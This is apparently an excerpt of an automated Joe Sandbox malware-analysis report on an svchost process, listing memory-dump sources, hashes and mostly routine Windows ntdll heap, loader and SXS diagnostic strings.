                                                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 036A54CE
                                                          • corrupted critical section, xrefs: 036A54C2
                                                          • Critical section address., xrefs: 036A5502
                                                          • Thread identifier, xrefs: 036A553A
                                                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 036A54E2
                                                          • Critical section address, xrefs: 036A5425, 036A54BC, 036A5534
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                          • API String ID: 0-2368682639
                                                          • Opcode ID: 901b5db5c862ce80c417aeb69ce44e4ca8714589b9262d274409f882408629be
                                                          • Instruction ID: 45aac73e284e222e6b6ce09a7945f23b09bfe3a2b8026c3149431584cb2a7b77
                                                          • Opcode Fuzzy Hash: 901b5db5c862ce80c417aeb69ce44e4ca8714589b9262d274409f882408629be
                                                          • Instruction Fuzzy Hash: E6819DB0A00758EFDB20CF98C941BAEBBB9FB49710F184159F659BB241D375A941CF60
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
                                                          • API String ID: 0-360209818
                                                          • Opcode ID: 179af670409d6ee83614192e47aa7ff7d291949fba0f0d6c72591bd193f3ff25
                                                          • Instruction ID: e17fecd882923972afb8290998e97f09edcb071017f5b709de10eee5121f10f8
                                                          • Opcode Fuzzy Hash: 179af670409d6ee83614192e47aa7ff7d291949fba0f0d6c72591bd193f3ff25
                                                          • Instruction Fuzzy Hash: 06628FB5E006298FDB24CF18C9417A9B7B6EF96310F5882DAD449AB340D7729EE1CF50
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                          • API String ID: 0-3591852110
                                                          • Opcode ID: c649eca0ecb7d5d24c71e40f20c9db7ea8caae3da64fca9e55583e340940f5c1
                                                          • Instruction ID: c7e5ab7149c905e8582025eb4fa73cd6962cf932f39ae9c2765d505d8e99d2cb
                                                          • Opcode Fuzzy Hash: c649eca0ecb7d5d24c71e40f20c9db7ea8caae3da64fca9e55583e340940f5c1
                                                          • Instruction Fuzzy Hash: C012CC74601642DFCB25CF28C545BBABBF5FF0A704F188459E4968B782D734E889EB60
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                          • API String ID: 0-3197712848
                                                          • Opcode ID: 535daef1034d7f2f9aeb120d4eb2a07d6549d8e5798ee36a6f563aedddf09fee
                                                          • Instruction ID: 795c46e2df0cc8f555d5d447516d9f282f181ef251fdc5b1e61611109ce8c171
                                                          • Opcode Fuzzy Hash: 535daef1034d7f2f9aeb120d4eb2a07d6549d8e5798ee36a6f563aedddf09fee
                                                          • Instruction Fuzzy Hash: 4512FE71A083419FD724DF68C940BAAB7E8BF85B04F08496EF8C58B381E774D945CB92
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                          • API String ID: 0-3532704233
                                                          • Opcode ID: 2fa499dab1739731274f3664558fec01f46db9498b3d81da4fb0a6d67204d1bb
                                                          • Instruction ID: 3889651b34ef4b7b7e461938dcb844dcc8261e10efd52513ff04f19d353db04f
                                                          • Opcode Fuzzy Hash: 2fa499dab1739731274f3664558fec01f46db9498b3d81da4fb0a6d67204d1bb
                                                          • Instruction Fuzzy Hash: A9B1BD715087619FC721EF64C580A6BBBE8AF88744F06492EF899E7340D770D949CFA2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                          • API String ID: 0-1357697941
                                                          • Opcode ID: 103acd7d7ec564acf7d07e89c136e36fe58558bf3d77339d6da66afacafab9e4
                                                          • Instruction ID: f9960eacd882f8698372767dc80e4e0f065a5b28fd14e252291b0af2dddba3c6
                                                          • Opcode Fuzzy Hash: 103acd7d7ec564acf7d07e89c136e36fe58558bf3d77339d6da66afacafab9e4
                                                          • Instruction Fuzzy Hash: 2BF11435A05655EFCB25CF6AC440BAAFBF5FF0A704F088059E4929B382C7B4A949DF50
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                          • API String ID: 0-3063724069
                                                          • Opcode ID: 7a9e26e6a5c68c2af10545e8cdc4c39cac6eb79fe9788ca00ff0ba153189ebfc
                                                          • Instruction ID: 61ce727a3c23c3f364e3a98415374876f01d044730021300aec43b057caf5ffa
                                                          • Opcode Fuzzy Hash: 7a9e26e6a5c68c2af10545e8cdc4c39cac6eb79fe9788ca00ff0ba153189ebfc
                                                          • Instruction Fuzzy Hash: 79D1E372814395AFE721DB64C840BBFBBE8EF84714F48492DFA849B250D770D914CB96
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                          • API String ID: 0-1700792311
                                                          • Opcode ID: f2a5523afdce4ce977b8cd870b31103a34b0afbc92692948a2e92e7ef25879c5
                                                          • Instruction ID: f0164e6b87c13e6c750d619c1bac27a5e9d3dd3b5db1fc0d2d676a67cefd902a
                                                          • Opcode Fuzzy Hash: f2a5523afdce4ce977b8cd870b31103a34b0afbc92692948a2e92e7ef25879c5
                                                          • Instruction Fuzzy Hash: A2D1DC39A01A81DFCB22DF6AC540AAEBBF1FF4A710F198049E4559F352C7B49949CF18
                                                          Strings
                                                          • @, xrefs: 0362D0FD
                                                          • Control Panel\Desktop\LanguageConfiguration, xrefs: 0362D196
                                                          • @, xrefs: 0362D2AF
                                                          • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0362D0CF
                                                          • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0362D146
                                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0362D2C3
                                                          • @, xrefs: 0362D313
                                                          • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0362D262
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                          • API String ID: 0-1356375266
                                                          • Opcode ID: 72e69bebd7e70c3fd46cb39334945dfd6b6de61d69092ec852a43d40fe452e05
                                                          • Instruction ID: cb85851827e826fcad21753db50097ac4547b48c8a4419d4333d8fff569c9925
                                                          • Opcode Fuzzy Hash: 72e69bebd7e70c3fd46cb39334945dfd6b6de61d69092ec852a43d40fe452e05
                                                          • Instruction Fuzzy Hash: CFA1BD719087159FD321DF20C584BABBBE8BB88715F014D2EFAA896240E774D908CF97
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI$MZER
                                                          • API String ID: 0-664215390
                                                          • Opcode ID: ba60c781db9624c796876b0880fc3e603f99dfd227fa986c71e2263b01d80aef
                                                          • Instruction ID: ad6ac6569fc788e4d372939171c662bfd6d1268261e2ddd578ef8a0af49df29f
                                                          • Opcode Fuzzy Hash: ba60c781db9624c796876b0880fc3e603f99dfd227fa986c71e2263b01d80aef
                                                          • Instruction Fuzzy Hash: B432A175E042698BEF22CF14CD94BEEBBB9AF46340F1841EAE449A7350D7719E818F44
                                                          Strings
                                                          • !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT), xrefs: 03697709
                                                          • [%x.%x] SXS: %s - Relative redirection plus env var expansion., xrefs: 036976EE
                                                          • @, xrefs: 03649EE7
                                                          • Internal error check failed, xrefs: 03697718, 036978A9
                                                          • Status != STATUS_NOT_FOUND, xrefs: 0369789A
                                                          • sxsisol_SearchActCtxForDllName, xrefs: 036976DD
                                                          • minkernel\ntdll\sxsisol.cpp, xrefs: 03697713, 036978A4
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)$@$Internal error check failed$Status != STATUS_NOT_FOUND$[%x.%x] SXS: %s - Relative redirection plus env var expansion.$minkernel\ntdll\sxsisol.cpp$sxsisol_SearchActCtxForDllName
                                                          • API String ID: 0-761764676
                                                          • Opcode ID: 9821035e8a453014ece937f37ce2b2cfc807442c344fa801961c18b93b8bfb36
                                                          • Instruction ID: ce9a9625f476e71c852b35efcb2517c31bb16415e025f6bd00a69f6157030bd8
                                                          • Opcode Fuzzy Hash: 9821035e8a453014ece937f37ce2b2cfc807442c344fa801961c18b93b8bfb36
                                                          • Instruction Fuzzy Hash: 8D127E74E00215DBDF24CFA8C981AAEB7F8FF49714F1884AAE845EB341E7349851CB65
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                          • API String ID: 0-1109411897
                                                          • Opcode ID: ada50179064d68e9e76df560ba570b3cc2044666056b4715a352dcda5ff2da1e
                                                          • Instruction ID: a645f34ba35d29ffbd308ebaab3d8fc28a150dd271f91b5ccc4638435b5d80d1
                                                          • Opcode Fuzzy Hash: ada50179064d68e9e76df560ba570b3cc2044666056b4715a352dcda5ff2da1e
                                                          • Instruction Fuzzy Hash: 8FA23875E056298BDF65CF19CD887A9B7B9AF46304F1442EAD80DAB350DB319E82CF10
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                          • API String ID: 0-523794902
                                                          • Opcode ID: 72a5aef6ef6444e9595da745d8e539337873a800b6722f11a1ecf024c2a3e55f
                                                          • Instruction ID: 322ca20196072f33bce53155b931c741b8985e9b5cbddc862d19e15b93ee4729
                                                          • Opcode Fuzzy Hash: 72a5aef6ef6444e9595da745d8e539337873a800b6722f11a1ecf024c2a3e55f
                                                          • Instruction Fuzzy Hash: C742FE75608B919FC714EF28C590A2AFBE5FF89204F094A6DE8868F381D730D842CF56
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                          • API String ID: 0-122214566
                                                          • Opcode ID: 8b98c884ee7763cdcea8c0fa9e12bbbeac5b2a7a574e0a433387637bb75a6b34
                                                          • Instruction ID: 61a59e040741913a494003336e544fdeb4c8de8bb2103f00a1675c65baf34e3b
                                                          • Opcode Fuzzy Hash: 8b98c884ee7763cdcea8c0fa9e12bbbeac5b2a7a574e0a433387637bb75a6b34
                                                          • Instruction Fuzzy Hash: E0C14B31E00215ABDF25CF69C881BBFBB69AF46710F184069E8869F381E7B4DD45C7A4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-792281065
                                                          • Opcode ID: 4c1d2e7a04ecdc933ddece91727a85b4a9a4d1d6c9c034d6b9cce3b8d80b486e
                                                          • Instruction ID: b68c1c0c0f3db365c919d15d3854d37e81bf53d2ce74437a05d76ae26da3ccad
                                                          • Opcode Fuzzy Hash: 4c1d2e7a04ecdc933ddece91727a85b4a9a4d1d6c9c034d6b9cce3b8d80b486e
                                                          • Instruction Fuzzy Hash: 73915A30B007149BDB35EF19ED95BAEBBA4EF41764F18812DE4106B381DBB45C01CBA4
                                                          Strings
                                                          • SXS: %s() passed the empty activation context, xrefs: 036A2165
                                                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 036A219F
                                                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 036A2180
                                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 036A21BF
                                                          • RtlGetAssemblyStorageRoot, xrefs: 036A2160, 036A219A, 036A21BA
                                                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 036A2178
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                          • API String ID: 0-861424205
                                                          • Opcode ID: 027ae63fec5a9fd33bf3da33435b057ce54c82c6edc4417136aa55880b35f0c9
                                                          • Instruction ID: e1286b9a273467c86b25e2f7ae68a3f042581395811c0b9c48785418b40d85a3
                                                          • Opcode Fuzzy Hash: 027ae63fec5a9fd33bf3da33435b057ce54c82c6edc4417136aa55880b35f0c9
                                                          • Instruction Fuzzy Hash: AD312836F802147BE721CA998C65F5FBF78DB95A80F094469FA14AB241D670DE01CBE1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$AVRF: Verifier .dlls must not have thread locals$KnownDllPath$L$\KnownDlls32
                                                          • API String ID: 0-3127649145
                                                          • Opcode ID: f09c361d136e02b536044bbb1501ea6cf512af7a3123cc3a67aa44ffd5df972f
                                                          • Instruction ID: 079f7b02c40717dd82f2f37a86bfded669839cbded2cc0aa82200cc3b98ade23
                                                          • Opcode Fuzzy Hash: f09c361d136e02b536044bbb1501ea6cf512af7a3123cc3a67aa44ffd5df972f
                                                          • Instruction Fuzzy Hash: 50325675A017199BDB21DF65CD88BDAB7F8FF48304F1041EAE509AB250EB70AA84CF54
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                                          • API String ID: 0-3393094623
                                                          • Opcode ID: 4df38a12d84b5784f3ae92eada6a23063a2eb516cbd90a3db17ff7bf2ce9e9f6
                                                          • Instruction ID: b4bbb8a3345e8df193a233aff2847d6fbb3dccb76847ee3e3fdb4cc015cfd3f5
                                                          • Opcode Fuzzy Hash: 4df38a12d84b5784f3ae92eada6a23063a2eb516cbd90a3db17ff7bf2ce9e9f6
                                                          • Instruction Fuzzy Hash: E80247759483418BD720CF64C184BABFBE9BF8A704F48895EE9998B350E770D845CB92
                                                          Strings
                                                          • Kernel-MUI-Number-Allowed, xrefs: 03655247
                                                          • Kernel-MUI-Language-Allowed, xrefs: 0365527B
                                                          • Kernel-MUI-Language-SKU, xrefs: 0365542B
                                                          • Kernel-MUI-Language-Disallowed, xrefs: 03655352
                                                          • WindowsExcludedProcs, xrefs: 0365522A
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                          • API String ID: 0-258546922
                                                          • Opcode ID: db691c9df998bc7dca5f14913f6d83fd39be106608a56654a86aac575ff5a186
                                                          • Instruction ID: 2e24198e7618d9fd888421c9e0721b4db3869862d1ff53ce57264453007a6ab2
                                                          • Opcode Fuzzy Hash: db691c9df998bc7dca5f14913f6d83fd39be106608a56654a86aac575ff5a186
                                                          • Instruction Fuzzy Hash: D8F15E76D10218EFCF15DFA4C944AEEBBBDEF49610F54406AEA02AB350E7709E01CB90
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                          • API String ID: 0-2518169356
                                                          • Opcode ID: d19f665de6145a23464f17b97a3df762c7a734309cf6e7456998d0b1962578c8
                                                          • Instruction ID: faa293ad065d6e7de36ca2f0e14ba8532ee0e66932fe4de1b3f16d417c6be6df
                                                          • Opcode Fuzzy Hash: d19f665de6145a23464f17b97a3df762c7a734309cf6e7456998d0b1962578c8
                                                          • Instruction Fuzzy Hash: 2191CE72D006199BCB21CFA9C981AFEB7B4EF89310F594169E912EB350D735D981CF90
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058426650.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: _blv$qlN$qlN$}:m#$N
                                                          • API String ID: 0-1183137600
                                                          • Opcode ID: 99030bf9d5ea6e49f26d9a3499c05f994050e490823a0cd1fa1c162bdfc63bd4
                                                          • Instruction ID: b0480291decca4ab445695d0b1b7849e8d05586ffea5373b9fe2eb10f1878bfe
                                                          • Opcode Fuzzy Hash: 99030bf9d5ea6e49f26d9a3499c05f994050e490823a0cd1fa1c162bdfc63bd4
                                                          • Instruction Fuzzy Hash: 01519171D1064A87CF08CF99C8504EEF771EFA5300B24826AE9097F391EB749A81CB84
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-1975516107
                                                          • Opcode ID: e9bce0ca7d71ad87aa926909e0c09ac35583136da5c8a7dd21dab9b7836afb74
                                                          • Instruction ID: 00efb9c74984a7da902590043fdc1eb3fbf7d88aa40c5547363a3a4106228ecf
                                                          • Opcode Fuzzy Hash: e9bce0ca7d71ad87aa926909e0c09ac35583136da5c8a7dd21dab9b7836afb74
                                                          • Instruction Fuzzy Hash: C451CC75E00345DFDB24EFA4C5847ADBBB1BF49318F288169E801AB3D1D778A981CB80
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                          • API String ID: 0-3178619729
                                                          • Opcode ID: 3fd0cfbd61013f7919ead066e3533beb73be444fa71dbf6bd8aaf22eecdd1f7a
                                                          • Instruction ID: 8010ee9bfdacfffd91313a7cd346c0c7c5e4772cfe80c8784da66ebd3cb2a17f
                                                          • Opcode Fuzzy Hash: 3fd0cfbd61013f7919ead066e3533beb73be444fa71dbf6bd8aaf22eecdd1f7a
                                                          • Instruction Fuzzy Hash: 6F139A70E00655DFDB29CF68C9807AAFBF1BF49304F1881A9D859AB381D735A946CF90
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                          • API String ID: 0-3570731704
                                                          • Opcode ID: 3b3422b8ad626369b6065282067b3dbf932e79d6d1411e3bdd2ca28759595f88
                                                          • Instruction ID: 207d8bdc2e9b9ac840d5169847e68bee684e19f89c6b0ba403329769e768eb60
                                                          • Opcode Fuzzy Hash: 3b3422b8ad626369b6065282067b3dbf932e79d6d1411e3bdd2ca28759595f88
                                                          • Instruction Fuzzy Hash: C4925775E00268CFEB25CF18C940BA9B7B9BF46314F0981EAD94AAB350D7749E81CF15
                                                          Strings
                                                          • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 03697D03
                                                          • SsHd, xrefs: 0364A885
                                                          • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 03697D56
                                                          • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 03697D39
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
                                                          • API String ID: 0-2905229100
                                                          • Opcode ID: 704b97210f796c4f7b329dfb576abca5c39fa37ad633598925c68217e32c54c6
                                                          • Instruction ID: c7a2d3143bf4a17592fb71fa2447cf15ff0a1dbaead91b037836ee3d31c60cfb
                                                          • Opcode Fuzzy Hash: 704b97210f796c4f7b329dfb576abca5c39fa37ad633598925c68217e32c54c6
                                                          • Instruction Fuzzy Hash: 2ED17A35E50219AFDF24CFA8C980AADF7B5FF48310F19416AE845AB351D771E981CBA0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.2058786262.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_3600000_svchost.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                          • API String ID: 0-3178619729
